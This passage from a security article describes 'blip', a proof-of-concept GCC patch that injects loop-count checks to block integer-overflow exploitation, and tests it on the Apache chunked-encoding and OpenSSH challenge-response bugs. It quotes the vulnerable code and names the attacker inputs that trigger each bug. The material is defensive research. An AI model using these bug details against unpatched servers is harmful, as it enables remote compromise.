+uncertainty of being able to *safely* modify the AST tree at that time. 
+Since the RTL "conversion machine" is already processed some parts of the 
+AST tree, it might be dangerous to patch the AST tree at that time.
+
+Finally, I have decided that the goal of making this patch simple, 
+implies selecting the first option of calling my evolution functions from 
+the C parser.
+
+I've placed the hook into my patch in three locations. Two calls inside 
+the c-parse.y (main parser file) code allowing me to examine the FOR and 
+WHILE loops and to modify them on the fly. The third call is located 
+outside the parser since catching all call locations was quite tricky to 
+do from within the parser. Basically since in many different situations a 
+CALL_EXPR is created hooking all of them seems to be non-natural. The 
+alternative that I found which seems to work just fine for me, was to add 
+a call to my function inside the build_function_call() within the c-
+typeck.c file (C compiler type-checking expression builder).
+
+The main entry into the patch is the blip_check_loop_limit() function 
+which will do all the work of checking if a loop seems to be relevant, 
+and to call the right function that will do the actual patching of the 
+AST tree.
+
+In order for a loop to be considered it needs to look like a count loop. 
+The blip patch will therefore try to examine each loop and decide if the 
+loop seems to be a counter loop (exact criteria for examining loops will 
+follow). For each count loop an attempt is made to detect the "count" 
+variable and the "limit" variable.
+
+Example of simple loops and their variables:
+ - for(i=0; i < j; i+=3}{;} ==> Increment loop, i = count j = limit.
+ - while(len--){;} ==> decrement loop, len = counter ; 0 = limit.
+
+The current implementation considers a loop as count loop only if:
+ - 2 variables are detected in the loop condition 
+   (sometimes one of them can be a constant)
+ - one of those variables is modified in the loop condition or in the 
+loop expr
+ - *only one* variable is modified
+ - the modification is of the increment / decrement style (++,--,+=,-=)
+
+The code, which examines the loop, is executed in blip_find_loop_vars() 
+and it may be improved in the future to identify more loops as count 
+loops.
+
+After detecting the loop direction, the loop count and the limit, the AST 
+tree is modified to include a check that verifies that a big loop is 
+reported as a blip violation.
+
+In order to keep the patch simple and risk free, any time a loop seems 
+too complex to be understood as count loop, the loop will be ignored 
+(Using the blip warning flags its possible to list the ignored loops, and 
+the reason why they were ignored). 
+
+
+------[ 4.5.2 - Modifying the AST
+
+When you start patching complex applications such as gcc, you want to 
+make sure you are not causing any "butterfly effect" while modifying 
+memory resident structures on the fly. To save yourself from a lot of 
+trouble I will suggest avoiding modification to any structure directly. 
+But instead use the existing functions that the language parser would 
+have used if the code you want to "inject" was found in the original 
+source code. Following this layer of encapsulation will save you from 
+making mistakes such as forgetting to initialize a structure member, or 
+not updating another global variable or flag. 
+
+I found it very helpful to simulate the code injection by actually 
+modifying the source code, and tracing the compiler as it builds the AST 
+tree, and later mimicking the code creation by using the same functions 
+used by the parser to build my new check code. This way I was able to 
+eliminate the need of "dirty" access to the AST tree, which I was quite 
+afraid of while starting the modification.
+
+Knowing the right set of functions to use to inject any code I would 
+like, the question became what would I really like to inject? The answer 
+differs a bit between the different loop types. In the case of a for-loop 
+the blip patch will add the check expression as the last expression in 
+the FOR_INIT statement. In the case of the while loop the blip patch will 
+add the check expression as a new statement before the while loop. In the 
+case of a function call to a "loop like" function such as memcpy, the 
+blip patch will replace the whole call expression with a new condition 
+expression, having the __blip_violation on the "true" side, and the 
+original call expression on the "false" side.
+
+Let's illustrate the last paragraph with some samples..
+
+Before blip
+-----------
+
+1) for(i=0;i< len;i++){}
+
+2) While(len--){}	
+
+3) p = memcpy(d,s,l)
+
+
+After blip
+----------
+
+1) for(i=0,<blip_check>?__blip_violation:0;i<len;i++){}
+
+2) <blip_check>?__blip_violation:0;
+   while(len--){}
+
+3) p = <blip_check>?__blip_violation : memcpy(d,s,l)
+
+
+The <blip_check> itself is quite simple. If the loop is incremental 
+(going up) then the check will look like: (limit > count && limit-count > 
+max).  If the loop is going down the check will be (count > limit && 
+count - limit > max). There is a need to check the delta between the 
+count and the limit and not only the limit since we don't want to trigger 
+false positive in a loop such as:
+
+len = 0xffff0000;
+for(i=len-20;i < len; i++){};
+
+The above example may look at first like an integer exploit. But it may 
+also be a legitimate loop which simply happens to iterate over very high 
+values.
+
+The function responsible for building the <blip_check> is 
+blip_build_check_exp(), and its the code is self-explanatory, so I will 
+not duplicate the function comments here.	
+
+One of the difficulties I had while injecting the blip code, was the 
+injection of the __blip_violation function into the target file. While 
+creating the <blip_check> I simply created expressions which reference 
+the same tree nodes I found in the loop condition or as parameter to the 
+loop like function call. But the __blip_violation function didn't exist 
+in the name space of the compiled file, and therefore trying to reference 
+it was a bit trickier, or so I thought. Usually when a CALL_EXPR is 
+created, a FUNCTION_DECL is identified (as one of the available function 
+visible to the caller) and an ADDR_EXPR is later created to express the 
+address of the declared function.  Since __blip_violation was not 
+declared , attempts to execute lookup_name() for that name will yield 
+an empty declaration. 
+
+Fortunately gcc was kind / forgiving enough, and I was able to build a 
+FUNCTION_DECL and reference it leaving all the rest of the work for the 
+RTL to figure out. The code, which builds the function call, is located 
+in blip_build_violation_call(). The function body of __blip_violation is 
+located in the libgcc2.c (Thanks for ProPolice for giving an example..).
+
+<DISCLAIMER> All the modification above is being done in the spirit of 
+proof of concept for the blip integer exploits detection. There is no 
+warranty that the patch will actually increase the protection of any 
+system, nor that it will keep the compiler stable and usable (while using 
+-fblip), nor that any of the coding / patching recommendation made in the 
+article will make any sense to the hardcore maintainer of the gcc project 
+:>.</DISCLAIMER>
+
+----[ 4.6 - Limitations
+
+This section summarizes the limitations known to me at the time of 
+writing this article. I will start from the high-level limitations going 
+to the low level technical limitations. 
+
+ - The first limitation is the coverage of the patch. The patch is 
+designed to stop integer vulnerabilities that yield big loops. Other 
+vulnerabilities that are due to bad design or lack of integer validation 
+will not be protected. 
+
+For example the following code is vulnerable but cannot be protected by 
+the patch:
+
+void foo(unsigned int len,char* buf){
+
+	char	dst[10];
+
+	if(len < 10){
+		strcpy(dst,buf);
+	}
+}
+
+
+ - Sometimes a generic integer overflow done "by the book" will not be 
+detected. An example for such a case will be the xdr_array vulnerability. 
+The problem is due to the fact that the malloc function was called with 
+the overflowed expression of *two* different integer input, while the 
+blip protection can handle only a single big count loop. When looking at 
+the xdr_array loop, we can see that it will be easy for the attacker to 
+supply such input integers, that will overflow the malloc expression, but 
+will still keep the loop count small.
+
+
+ - Some count loops will not be considered. One example is a complex 
+loop condition and it is non trivial to identify the count loop. Such 
+loops must be ignored, or otherwise false positives may occur which may 
+lead to undefined execution.
+
+ - [Technical limitation] The current version is designed to work only 
+with C language. 
+
+ - [Technical limitation] The current version will not examine embedded 
+assembly code which may include "loop" instructions. Therefore allowing 
+integer overflow exploitation to go undetected.
+
+--[ 5 - References
+
+[1] StackGuard 
+    Automatic Detection and Prevention of Stack Smashing Attacks
+    http://www.immunix.org/StackGuard/
+
+[2] ProPolic 
+    GCC extension for protecting applications from stack-smashing attacks
+    http://www.trl.ibm.com/projects/security/ssp/
+
+[3] GCC
+    GNU Compiler Collection
+    http://gcc.gnu.org
+
+[4] noir
+    Smashing The Kernel Stack For Fun And Profit
+    Phrack Issue #60, Phile 0x06 by noir
+
+[5] Halvar Flake
+    Third Generation Exploits on NT/Win2k Platforms
+    http://www.blackhat.com/presentations/bh-europe-01/halvar-flake/bh-
+europe-01-halvarflake.ppt
+
+[6] MaXX
+    Vudo malloc tricks
+    Phrack Issue 0x39, Phile #0x08
+
+[7] Once upon a free()..
+    Phrack Issue 0x39, Phile #0x09
+
+[8] Aleph One
+    Smashing The Stack For Fun And Profit
+    Phrack Issue 0x31, Phile #0x0E
+
+
+--[ 6 - Thanks
+
+I want to thanks my team for helping me in the process of creating the 
+paper. Thank you Monty, sinan, yona, shok for your helpful comments and 
+ideas for improving the paper. If you think the English in this paper is 
+broken imagine what my team had to go through :>. Without you guys I 
+would never made it.
+
+Thanks to anonymous :> for read proofing the paper, and providing helpful 
+technical feedback and reassurance.
+
+--[ 7 - Appendix A - Real life examples
+
+Having the patch ready, I wanted to give it a test drive on one of the 
+known and high profile vulnerabilities. The criteria used for checking 
+the patch was: 
+
+ - The package should be compiled successfully with the patch 
+ - The patch should be able to protect the package against exploitation 
+of the known bugs
+
+I've selected to test the patch on Apache httpd and the OpenSSH packages. 
+Since both packages are: high profile, have vulnerabilities that the 
+patch should is expected to protect against (in vulnerable version), and 
+they are big enough to "qa" the patch a little bit.
+
+
+The protection test was proven to be successful:), and the vulnerable 
+version compiled with -fblip proved to be non exploitable. 
+
+The following section explains how to compile the packages with the blip 
+patch. We will show the output assembly generated before / after the 
+patch for the code which was enabling the exploit to overflow the program 
+buffers.
+
+----[ 7.1 - Apache Chunked encoding
+
+--[ Vulnerability info
+
+Just to make sure that all are in sync with the issue of the apache 
+chunked-encoding vulnerability I will list part of the vulnerable code 
+followed by some explanation.
+
+Code: Apache src/main/http_protocol.c : ap_get_client_block()
+
+01 len_to_read = get_chunk_size(buffer);
+
+<some code here...>
+
+02 r->remaining = len_to_read;
+
+<some code here...>
+
+03 len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining;
+04 len_read = ap_bread(r->connection->client, buffer , len_to_read);
+
+
+The vulnerability in this case allows a remote attacker to send a 
+negative chunk length. Doing so will bypass the check at line 3, and will 
+end up with calling the ap_bread() with a huge positive number. 
+
+--[ Testing patch
+
+To compile the apache httpd with the -fblip enabled, one may edit the 
+file src/apaci and add the following line at the EOF "echo '-fblip'".
+
+Any attempt to send a negative chunk length after compiling apache httpd 
+with the blip patch will end up with the httpd executing the 
+__blip_violation.
+
+According to the blip theory, the attack should trigger some kind of a 
+loop. We can see at line 4 of the listed code that a call is made to the 
+ap_bread() function. So if the theory is correct we are supposed to find 
+a loop inside that function. 
+
+
+/*
+ * Read up to nbyte bytes into buf.
+ * If fewer than byte bytes are currently available, then return those.
+ * Returns 0 for EOF, -1 for error.
+ * NOTE EBCDIC: The readahead buffer _always_ contains *unconverted* 
+data.
+ * Only when the caller retrieves data from the buffer (calls bread)
+ * is a conversion done, if the conversion flag is set at that time.
+ */
+API_EXPORT(int) ap_bread(BUFF *fb, void *buf, int nbyte)
+{
+    int i, nrd;
+
+    if (fb->flags & B_RDERR)
+	return -1;
+    if (nbyte == 0)
+	return 0;
+
+    if (!(fb->flags & B_RD)) {
+	/* Unbuffered reading.  First check if there was something in the
+	 * buffer from before we went unbuffered. */
+	if (fb->incnt) {
+	    i = (fb->incnt > nbyte) ? nbyte : fb->incnt;
+#ifdef CHARSET_EBCDIC
+	    if (fb->flags & B_ASCII2EBCDIC)
+		ascii2ebcdic(buf, fb->inptr, i);
+	    else
+#endif /*CHARSET_EBCDIC*/
+	    memcpy(buf, fb->inptr, i);
+	    fb->incnt -= i;
+	    fb->inptr += i;
+	    return i;
+	}
+	i = read_with_errors(fb, buf, nbyte);
+#ifdef CHARSET_EBCDIC
+	if (i > 0 && ap_bgetflag(fb, B_ASCII2EBCDIC))
+	    ascii2ebcdic(buf, buf, i);
+#endif /*CHARSET_EBCDIC*/
+	return i;
+    }
+
+    nrd = fb->incnt;
+/* can we fill the buffer */
+    if (nrd >= nbyte) {
+#ifdef CHARSET_EBCDIC
+	if (fb->flags & B_ASCII2EBCDIC)
+	    ascii2ebcdic(buf, fb->inptr, nbyte);
+	else
+#endif /*CHARSET_EBCDIC*/
+	memcpy(buf, fb->inptr, nbyte);
+	fb->incnt = nrd - nbyte;
+	fb->inptr += nbyte;
+	return nbyte;
+    }
+
+    if (nrd > 0) {
+#ifdef CHARSET_EBCDIC
+	if (fb->flags & B_ASCII2EBCDIC)
+	    ascii2ebcdic(buf, fb->inptr, nrd);
+	else
+#endif /*CHARSET_EBCDIC*/
+	memcpy(buf, fb->inptr, nrd);
+	nbyte -= nrd;
+	buf = nrd + (char *) buf;
+	fb->incnt = 0;
+    }
+    if (fb->flags & B_EOF)
+	return nrd;
+
+/* do a single read */
+    if (nbyte >= fb->bufsiz) {
+/* read directly into caller's buffer */
+	i = read_with_errors(fb, buf, nbyte);
+#ifdef CHARSET_EBCDIC
+	if (i > 0 && ap_bgetflag(fb, B_ASCII2EBCDIC))
+	    ascii2ebcdic(buf, buf, i);
+#endif /*CHARSET_EBCDIC*/
+	if (i == -1) {
+	    return nrd ? nrd : -1;
+	}
+    }
+    else {
+/* read into hold buffer, then memcpy */
+	fb->inptr = fb->inbase;
+	i = read_with_errors(fb, fb->inptr, fb->bufsiz);
+	if (i == -1) {
+	    return nrd ? nrd : -1;
+	}
+	fb->incnt = i;
+	if (i > nbyte)
+	    i = nbyte;
+#ifdef CHARSET_EBCDIC
+	if (fb->flags & B_ASCII2EBCDIC)
+	    ascii2ebcdic(buf, fb->inptr, i);
+	else
+#endif /*CHARSET_EBCDIC*/
+	memcpy(buf, fb->inptr, i);
+	fb->incnt -= i;
+	fb->inptr += i;
+    }
+    return nrd + i;
+}
+
+ 
+We can see in the code several possible execution flows. Each one of them 
+includes a "loop" that moves all the data into the buf parameter. If the 
+code supports CHARSET_EBCDIC then the ascii2ebdcdic function executes the 
+deadly loop. On other normal cases, the memcpy function implements the 
+deadly loop. 
+
+Following is the assembly code generated for the above function. 
+
+	.type	ap_bread,@function
+ap_bread:
+	pushl	%ebp
+	movl	%esp, %ebp
+	subl	$40, %esp
+	movl	%ebx, -12(%ebp)
+	movl	%esi, -8(%ebp)
+	movl	%edi, -4(%ebp)
+	movl	8(%ebp), %edi
+	movl	16(%ebp), %ebx
+	testb	$16, (%edi)
+	je	.L68
+	movl	$-1, %eax
+	jmp	.L67
+.L68:
+	movl	$0, %eax
+	testl	%ebx, %ebx
+	je	.L67
+	testb	$1, (%edi)
+	jne	.L70
+	cmpl	$0, 8(%edi)
+	je	.L71
+	movl	8(%edi), %esi
+	cmpl	%ebx, %esi
+	jle	.L72
+	movl	%ebx, %esi
+.L72:
+	cmpl	$268435456, %esi          ------------------------
+	jbe	.L73
+	movl	%esi, (%esp)               Blip Check (Using esi)
+	call	__blip_violation
+	jmp	.L74                      ------------------------
+.L73:
+	movl	4(%edi), %eax
+	movl	12(%ebp), %edx
+	movl	%edx, (%esp)
+	movl	%eax, 4(%esp)
+	movl	%esi, 8(%esp)
+	call	memcpy
+.L74:
+	subl	%esi, 8(%edi)
+	addl	%esi, 4(%edi)
+	movl	%esi, %eax
+	jmp	.L67
+.L71:
+	movl	%edi, (%esp)
+	movl	12(%ebp), %eax
+	movl	%eax, 4(%esp)
+	movl	%ebx, 8(%esp)
+	call	read_with_errors
+	jmp	.L67
+.L70:
+	movl	8(%edi), %edx
+	movl	%edx, -16(%ebp)
+	cmpl	%ebx, %edx
+	jl	.L75
+	cmpl	$268435456, %ebx          ------------------------
+	jbe	.L76
+	movl	%ebx, (%esp)               Blip check (using ebx)
+	call	__blip_violation
+	jmp	.L77                      ------------------------
+.L76:
+	movl	4(%edi), %eax
+	movl	12(%ebp), %edx
+	movl	%edx, (%esp)
+	movl	%eax, 4(%esp)
+	movl	%ebx, 8(%esp)
+	call	memcpy
+.L77:
+	movl	-16(%ebp), %eax
+	subl	%ebx, %eax
+	movl	%eax, 8(%edi)
+	addl	%ebx, 4(%edi)
+	movl	%ebx, %eax
+	jmp	.L67
+.L75:
+	cmpl	$0, -16(%ebp)
+	jle	.L78
+	cmpl	$268435456, -16(%ebp)     ------------------------
+	jbe	.L79
+	movl	-16(%ebp), %eax             Blip check
+	movl	%eax, (%esp)                (using [ebp-16])
+	call	__blip_violation
+	jmp	.L80                      ------------------------
+.L79:
+	movl	4(%edi), %eax
+	movl	12(%ebp), %edx
+	movl	%edx, (%esp)
+	movl	%eax, 4(%esp)
+	movl	-16(%ebp), %eax
+	movl	%eax, 8(%esp)
+	call	memcpy
+.L80:
+	subl	-16(%ebp), %ebx
+	movl	-16(%ebp), %edx
+	addl	%edx, 12(%ebp)
+	movl	$0, 8(%edi)
+.L78:
+	testb	$4, (%edi)
+	je	.L81
+	movl	-16(%ebp), %eax
+	jmp	.L67
+.L81:
+	cmpl	28(%edi), %ebx
+	jl	.L82
+	movl	%edi, (%esp)
+	movl	12(%ebp), %eax
+	movl	%eax, 4(%esp)
+	movl	%ebx, 8(%esp)
+	call	read_with_errors
+	movl	%eax, %esi
+	cmpl	$-1, %eax
+	jne	.L85
+	jmp	.L91
+.L82:
+	movl	20(%edi), %eax
+	movl	%eax, 4(%edi)
+	movl	%edi, (%esp)
+	movl	%eax, 4(%esp)
+	movl	28(%edi), %eax
+	movl	%eax, 8(%esp)
+	call	read_with_errors
+	movl	%eax, %esi
+	cmpl	$-1, %eax
+	jne	.L86
+.L91:
+	cmpl	$0, -16(%ebp)
+	setne	%al
+	movzbl	%al, %eax
+	decl	%eax
+	orl	-16(%ebp), %eax
+	jmp	.L67
+.L86:
+	movl	%eax, 8(%edi)
+	cmpl	%ebx, %eax
+	jle	.L88
+	movl	%ebx, %esi
+.L88:
+	cmpl	$268435456, %esi          ------------------------
+	jbe	.L89
+	movl	%esi, (%esp)               Blip check (using esi)
+	call	__blip_violation
+	jmp	.L90                      ------------------------
+.L89:
+	movl	4(%edi), %eax
+	movl	12(%ebp), %edx
+	movl	%edx, (%esp)
+	movl	%eax, 4(%esp)
+	movl	%esi, 8(%esp)
+	call	memcpy
+.L90:
+	subl	%esi, 8(%edi)
+	addl	%esi, 4(%edi)
+.L85:
+	movl	-16(%ebp), %eax
+	addl	%esi, %eax
+.L67:
+	movl	-12(%ebp), %ebx
+	movl	-8(%ebp), %esi
+	movl	-4(%ebp), %edi
+	movl	%ebp, %esp
+	popl	%ebp
+	ret
+
+
+One can notice that before any call to the memcpy function (which is one 
+of the "loop like" functions), a little code was added which calls 
+__blip_violation in the case the 3rd parameter of memcpy is bigger than 
+blip_max. 
+
+Another thing worth mentioning is the way the injected check is accessing 
+this 3rd parameter. In the first block of the injected code the parameter 
+is stored at the esi register, at the second block the parameter is 
+stored in the ebx register and in the third block the parameter is stored 
+on the stack at ebp-16. The reason for that is very simple. Since the 
+modification of the code was done at the AST tree, and since the patch 
+was using the exact same tree node that was used in the call expression 
+to memcpy, the RTL generated the same code for both the call expression 
+and the check expression. 
+
+Now lets go back to the ap_bread function. And lets assume that the 
+CHARSET_EBCDIC was indeed defined. In that case the ascii2ebcdic function 
+would have being the one to have the "vulnerable" loop. Therefore we hope 
+that the blip patch would check the loop in that function as well.
+
+
+The following is the ascii2ebcdic code taken from src/ap/ap_ebcdic.c
+
+API_EXPORT(void *)
+ascii2ebcdic(void *dest, const void *srce, size_t count)
+{
+    unsigned char *udest = dest;
+    const unsigned char *usrce = srce;
+
+    while (count-- != 0) {
+        *udest++ = os_toebcdic[*usrce++];
+    }
+
+    return dest;
+}
+
+
+ 
+Result of compiling the above function with the -fblip 
+
+	.type	ascii2ebcdic,@function
+ascii2ebcdic:
+	pushl	%ebp
+	movl	%esp, %ebp
+	pushl	%edi
+	pushl	%esi
+	pushl	%ebx
+	subl	$12, %esp
+	movl	16(%ebp), %ebx
+	movl	8(%ebp), %edi
+	movl	12(%ebp), %esi
+	cmpl	$0, %ebx            -------------------
+	jbe	.L12
+	cmpl	$268435456, %ebx
+	jbe	.L12                   Blip check
+	movl	%ebx, (%esp)
+	call	__blip_violation
+.L12:                            -------------------
+	decl	%ebx
+	cmpl	$-1, %ebx
+	je	.L18
+.L16:
+	movzbl	(%esi), %eax
+	movzbl	os_toebcdic(%eax), %eax
+	movb	%al, (%edi)
+	incl	%esi
+	incl	%edi
+	decl	%ebx
+	cmpl	$-1, %ebx
+	jne	.L16
+.L18:
+	movl	8(%ebp), %eax
+	addl	$12, %esp
+	popl	%ebx	
+	popl	%esi
+	popl	%edi
+	popl	%ebp
+	ret
+.Lfe2:
+
+While processing the ascii2ebcdic function, the blip patch identified the 
+while loop as a count-loop. The loop condition supplies all the 
+information required to create a <blip_check>. First we identify the 
+variables of the loop. In this case "count" is one var and the constant 
+"0" is the second one. Looking for variable modification, we can see that 
+"count" is decremented in the expression "count--". Since "count" is the 
+only modified variable we can say that "count" is the count-variable and 
+the constant 0 is the limit-variable. We can also say that the loop is a 
+decrement-loop since the modification operation is "--". The check 
+therefore will be (count > limit && count - limit > MAX_BLIP). Looking at 
+the above assembly code, we can see that the loop count is stored in the 
+ebx register (Its easy to spot this by looking at the code below label 12 
+(L12). This code represent the while condition. It first decrements ebx 
+and later compares it with the loop constant). The <blip_check> therefore 
+will utilize the ebx register for the check.
+
+----[ 7.2 - OpenSSH auth
+
+--[ Vulnerability info	
+
+The OpenSSH Vulnerability is an example of an integer overflow bug, which 
+results in a miscalculated allocation size. The following is a snippet of 
+the vulnerable code:
+
+OpenSSH auth2-chall.c : input_userauth_info_response()
+
+01 nresp = packet_get_int();
+
+<some code here ..>
+
+02 response = xmalloc(nresp * sizeof(char*));
+03 for(i = 0; i < nresp; i++)
+04	response[i] = packet_get_string(NULL);
+
+At line 01 the code reads an integer into an unsigned variable. Later the 
+code allocates an array with nresp entries. The problem is that nresp * 
+sizeof(char*) is an expression that may overflow. Therefore sending nresp 
+bigger than 0x40000000 allows allocation of a small buffer that can be 
+later overflowed by the assignment in line 04.
+
+--[ Testing the patch
+
+To compile the OpenSSH package with the -fblip enabled, one may add -
+fblip to the CFLAGS definition at Makefile.in (i.e. CFLAGS=@CFLAGS@ -
+fblip)
+
+Any attempt to send a large number of responses after compiling OpenSSH 
+with the blip patch will end up with OpenSSH executing the 
+__blip_violation. 
+
+The following is snippet of the vulnerable function. 
+
+static void
+input_userauth_info_response(int type, u_int32_t seq, void *ctxt)
+{
+	Authctxt *authctxt = ctxt;
+	KbdintAuthctxt *kbdintctxt;
+	int i, authenticated = 0, res, len;
+	u_int nresp;
+	char **response = NULL, *method;
+
+	<omitted code>
+
+	nresp = packet_get_int();
+
+	if (nresp != kbdintctxt->nreq)
+		fatal("input_userauth_info_response: wrong number of 
+replies");
+
+	if (nresp > 0) {
+		
+		-----------------------------------------
+			 **  Vulnerable code **
+		-----------------------------------------
+
+		response = xmalloc(nresp * sizeof(char*));
+		for (i = 0; i < nresp; i++)
+			response[i] = packet_get_string(NULL);
+
+
+	}
+
+	<omitted code>
+}
+
+The above function is translated to the following assembly code if 
+compiled with the -fblip protection.(In order to make blip modification 
+readable, the code was compiled using -O instead of using -O2, which will 
+reorder basic blocks)
+
+	.type	input_userauth_info_response,@function
+input_userauth_info_response:
+
+	movl	-16(%ebp), %eax
+	movl	$0, 4(%eax)
+	call	packet_get_int
+	movl	%eax, %esi
+	movl	-20(%ebp), %edx
+	cmpl	12(%edx), %eax
+	je	.L111
+	movl	$.LC15, (%esp)
+	call	fatal
+.L112:
+	testl	%esi, %esi
+	je	.L113
+	leal	0(,%esi,4), %eax
+	movl	%eax, (%esp)
+	call	xmalloc
+	movl	%eax, -32(%ebp)
+	movl	$0, %ebx
+	cmpl	$0, %esi
+	jbe	.L115
+	cmpl	$268435456, %esi          ------------------------
+	jbe	.L115
+	movl	%esi, (%esp)                   Blip Check
+	call	__blip_violation
+.L115:                                 ------------------------
+	cmpl	%esi, %ebx
+	jae	.L113
+.L120:
+	movl	$0, (%esp)
+	call	packet_get_string
+	movl	-32(%ebp), %ecx
+	movl	%eax, (%ecx,%ebx,4)
+	incl	%ebx
+	cmpl	%esi, %ebx
+	jb	.L120
+
+The blip patch identified the for-loop as a count-loop and injected a 
+code to direct the flow to the _blip_violation handler in the case that 
+the limit (i.e. nresp) is bigger then the BLIP_MAX. Therefore if nresp 
+value will be high enough to trigger an overflow in the call to xmalloc, 
+it will also be high enough to get caught by the <blip_check>.
+
+--[ 8 - Appendix B - Using blip  
+
+To enable the blip patch one should first add the -fblip flag when 
+executing the gcc compiler. 
+
+The blip patch will attempt to emit the <blip_check> whenever it seems 
+possible to do so. The patch will silently ignore all loops or calls, 
+which cannot be protected. In order to see the ignored loops one can use 
+one of the following warning flags, which will also provide a message 
+describing the reason for ignoring the specific loop.
+
+Warning flags:
+- blip_for_not_emit - report ignored for loops.
+- blip_while_not_emit - report ignored while loops.
+- blip_call_not_emit - report ignored calls to loop like function.
+
+A reason for ignoring a loop will be one of the following:
+- Loop variables are less then 4 bytes long
+- for init is not an expression
+- call to function is made using a pointer to function
+- call parameters have side effects. Reusing the expression may cause 
+unexpected results
+- loop condition is too complex in order to find the loop variables
+- non of loop variables is modified (not enough info to make check)
+- both loop var are modified
+- condition is too complex
+
+The blip patch is also capable of reporting check statistics. Using the 
+-fblip_stat one can make the blip patch to print out statistical 
+information about amount of loops processed and the amount of loops that 
+where successfully checked. 
+
+The following command line will compile the first sample code. The output 
+of the compilation will follow
+
+$ gcc -o sample -fblip -fblip_stat -O sample.c
+
+-=] Blip statistics (checks emits)
+Total:	1/100%		1/100%
+for:	1/100%		1/100%
+while:	0/0%		0/0%
+calls:	0/0%		0/0%
+-=] End Blip Statistics
+
+
+begin 640 blip.patch
+M9&EF9B`M3G5R(&=C8RTS+C(O9V-C+TUA:V5F:6QE+FEN(&=C8RTS+C(M8FQI
+M<"]G8V,O36%K969I;&4N:6X-"BTM+2!G8V,M,RXR+V=C8R]-86ME9FEL92YI
+M;@E4:'4@36%Y(#(S(#$P.C4W.C(Q(#(P,#(-"BLK*R!G8V,M,RXR+6)L:7`O
+M9V-C+TUA:V5F:6QE+FEN"4UO;B!$96,@(#(@,3DZ-#(Z,SD@,C`P,@T*0$`@
+M+3<R-RPW("LW,C<L-R!`0`T*("!S:6)C86QL+F\@<VEM<&QI9GDM<G1X+F\@
+M<W-A+F\@<W-A+6-C<"YO('-S82UD8V4N;R!S=&UT+F\)7`T*("!S=&]R+6QA
+M>6]U="YO('-T<FEN9W!O;VPN;R!T:6UE=F%R+F\@=&]P;&5V+F\@=')E92YO
+M('1R964M9'5M<"YO(`E<#0H@('1R964M:6YL:6YE+F\@=6YR;VQL+F\@=F%R
+M87-M+F\@=F%R<F%Y+F\@=F5R<VEO;BYO('9M<V1B9V]U="YO('AC;V9F;W5T
+M+F\@7`T*+2`D*$='0RD@)"AO=71?;V)J96-T7V9I;&4I("0H15A44D%?3T)*
+M4RD-"BL@8FQI<"YO("0H1T=#*2`D*&]U=%]O8FIE8W1?9FEL92D@)"A%6%12
+M05]/0DI3*0T*(`T*($)!0TM%3D0@/2!M86EN+F\@;&EB8F%C:V5N9"YA#0H@
+M#0I`0"`M-S8X+#<@*S<V."PX($!`#0H@#0H@3$E",D953D-37S(@/2!?9FQO
+M871D:7AF(%]F:7AU;G-X9G-I(%]F:7AT9F1I(%]F:7AU;G-T9F1I(%]F;&]A
+M=&1I=&8@7`T*("`@("!?8VQE87)?8V%C:&4@7W1R86UP;VQI;F4@7U]M86EN
+M(%]E>&ET(%]A8G-V<VDR(%]A8G-V9&DR(%]A9&1V<VDS(%P-"BT@("`@7V%D
+M9'9D:3,@7W-U8G9S:3,@7W-U8G9D:3,@7VUU;'9S:3,@7VUU;'9D:3,@7VYE
+M9W9S:3(@7VYE9W9D:3(@7V-T;W)S#0HK("`@(%]A9&1V9&DS(%]S=6)V<VDS
+M(%]S=6)V9&DS(%]M=6QV<VDS(%]M=6QV9&DS(%]N96=V<VDR(%]N96=V9&DR
+M(%]C=&]R<R!<#0HK"5]B;&EP7W9I;VQA=&EO;@T*(`T*(",@1&5F:6YE9"!I
+M;B!L:6)G8V,R+F,L(&EN8VQU9&5D(&]N;'D@:6X@=&AE('-T871I8R!L:6)R
+M87)Y+@T*($Q)0C)&54Y#4U]35"`](%]E<')I;G1F(%]B8B!?7V=C8U]B8VUP
+M#0ID:69F("U.=7(@9V-C+3,N,B]G8V,O8FQI<"YC(&=C8RTS+C(M8FQI<"]G
+M8V,O8FQI<"YC#0HM+2T@9V-C+3,N,B]G8V,O8FQI<"YC"5=E9"!$96,@,S$@
+M,38Z,#`Z,#`@,3DV.0T**RLK(&=C8RTS+C(M8FQI<"]G8V,O8FQI<"YC"4UO
+M;B!$96,@(#(@,3DZ-#(Z,SD@,C`P,@T*0$`@+3`L,"`K,2PX,S4@0$`-"BLO
+M*@T-"BL@*B`@("!4:&ES(&9I;&4@:7,@<&%R="!O9B!'3E4@0T,N#0T**R`J
+M#0T**R`J("`@($=.52!#0R!I<R!F<F5E('-O9G1W87)E.R!Y;W4@8V%N(')E
+M9&ES=')I8G5T92!I="!A;F0O;W(@;6]D:69Y#0T**R`J("`@(&ET('5N9&5R
+M('1H92!T97)M<R!O9B!T:&4@1TY5($=E;F5R86P@4'5B;&EC($QI8V5N<V4@
+M87,@<'5B;&ES:&5D(&)Y#0T**R`J("`@('1H92!&<F5E(%-O9G1W87)E($9O
+M=6YD871I;VX[(&5I=&AE<B!V97)S:6]N(#(L(&]R("AA="!Y;W5R(&]P=&EO
+M;BD-#0HK("H@("`@86YY(&QA=&5R('9E<G-I;VXN#0T**R`J#0T**R`J("`@
+M($=.52!#0R!I<R!D:7-T<FEB=71E9"!I;B!T:&4@:&]P92!T:&%T(&ET('=I
+M;&P@8F4@=7-E9G5L+`T-"BL@*B`@("!B=70@5TE42$]55"!!3ED@5T%24D%.
+M5%D[('=I=&AO=70@979E;B!T:&4@:6UP;&EE9"!W87)R86YT>2!O9@T-"BL@
+M*B`@("!-15)#2$%.5$%"24Q)5%D@;W(@1DE43D534R!&3U(@02!005)424-5
+M3$%2(%!54E!/4T4N("!3964@=&AE#0T**R`J("`@($=.52!'96YE<F%L(%!U
+M8FQI8R!,:6-E;G-E(&9O<B!M;W)E(&1E=&%I;',N#0T**R`J#0T**R`J("`@
+M(%EO=2!S:&]U;&0@:&%V92!R96-E:79E9"!A(&-O<'D@;V8@=&AE($=.52!'
+M96YE<F%L(%!U8FQI8R!,:6-E;G-E#0T**R`J("`@(&%L;VYG('=I=&@@1TY5
+M($-#.R!S964@=&AE(&9I;&4@0T]064E.1RX@($EF(&YO="P@=W)I=&4@=&\-
+M#0HK("H@("`@=&AE($9R964@4V]F='=A<F4@1F]U;F1A=&EO;BP@-3D@5&5M
+M<&QE(%!L86-E("T@4W5I=&4@,S,P+`T-"BL@*B`@("!";W-T;VXL($U!(#`R
+M,3$Q+3$S,#<L(%5302X@("HO#0T**PT-"BLC:6YC;'5D92`B8V]N9FEG+F@B
